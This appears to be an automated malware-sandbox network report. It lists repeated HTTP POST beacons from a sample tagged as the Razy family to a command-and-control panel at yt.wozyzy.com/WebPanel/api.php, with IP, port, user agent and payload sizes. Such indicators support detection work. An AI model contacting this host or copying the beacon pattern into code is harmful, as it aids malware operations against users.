http://yt.wozyzy.com/WebPanel/api.php
- Hostname: yt.wozyzy.com
- IP Address: 199.188.200.47
- Port: 80
- Count: 32
POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: yt.wozyzy.com Content-Length: 41460 Expect: 100-continue
http://yt.wozyzy.com/WebPanel/api.php
- Hostname: yt.wozyzy.com
- IP Address: 199.188.200.47
- Port: 80
- Count: 36
POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: yt.wozyzy.com Content-Length: 298 Expect: 100-continue
http://yt.wozyzy.com/WebPanel/api.php
- Hostname: yt.wozyzy.com
- IP Address: 199.188.200.47
- Port: 80
- Count: 1
POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: yt.wozyzy.com Content-Length: 41460 Expect: 100-continue Connection: Keep-Alive
http://yt.wozyzy.com/WebPanel/api.php
- Hostname: yt.wozyzy.com
- IP Address: 199.188.200.47
- Port: 80
- Count: 1
POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: yt.wozyzy.com Content-Length: 294 Expect: 100-continue Connection: Keep-Alive
http://yt.wozyzy.com/WebPanel/api.php
- Hostname: yt.wozyzy.com
- IP Address: 199.188.200.47
- Port: 80
- Count: 3
POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: yt.wozyzy.com Content-Length: 41428 Expect: 100-continue
http://yt.wozyzy.com/WebPanel/api.php
- Hostname: yt.wozyzy.com
- IP Address: 199.188.200.47
- Port: 80
- Count: 12
POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: yt.wozyzy.com Content-Length: 41462 Expect: 100-continue
http://yt.wozyzy.com/WebPanel/api.php
- Hostname: yt.wozyzy.com
- IP Address: 199.188.200.47
- Port: 80
- Count: 1
POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: yt.wozyzy.com Content-Length: 55516 Expect: 100-continue
http://yt.wozyzy.com/WebPanel/api.php
- Hostname: yt.wozyzy.com
- IP Address: 199.188.200.47
- Port: 80
- Count: 1
POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: yt.wozyzy.com Content-Length: 42048 Expect: 100-continue
http://yt.wozyzy.com/WebPanel/api.php
- Hostname: yt.wozyzy.com
- IP Address: 199.188.200.47
- Port: 80
- Count: 1
POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: yt.wozyzy.com Content-Length: 41430 Expect: 100-continue
http://yt.wozyzy.com/WebPanel/api.php
- Hostname: yt.wozyzy.com
- IP Address: 199.188.200.47
- Port: 80
- Count: 4
POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: yt.wozyzy.com Content-Length: 300 Expect: 100-continue
http://yt.wozyzy.com/WebPanel/api.php
- Hostname: yt.wozyzy.com
- IP Address: 199.188.200.47
- Port: 80
- Count: 1
POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: yt.wozyzy.com Content-Length: 41464 Expect: 100-continue
http://yt.wozyzy.com/WebPanel/api.php
- Hostname: yt.wozyzy.com
- IP Address: 199.188.200.47
- Port: 80
- Count: 2
POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: yt.wozyzy.com Content-Length: 41740 Expect: 100-continue
http://yt.wozyzy.com/WebPanel/api.php
- Hostname: yt.wozyzy.com
- IP Address: 199.188.200.47
- Port: 80
- Count: 1
POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: yt.wozyzy.com Content-Length: 296 Expect: 100-continue Connection: Keep-Alive
http://yt.wozyzy.com/WebPanel/api.php
- Hostname: yt.wozyzy.com
- IP Address: 199.188.200.47
- Port: 80
- Count: 1
POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: yt.wozyzy.com Content-Length: 298 Expect: 100-continue Connection: Keep-Alive
Detected family: #Razy
TheSystem Itself @ 2018-02-08 22:56:07
#infosec #automation
TheSystem Itself @ 2018-02-08 22:30:25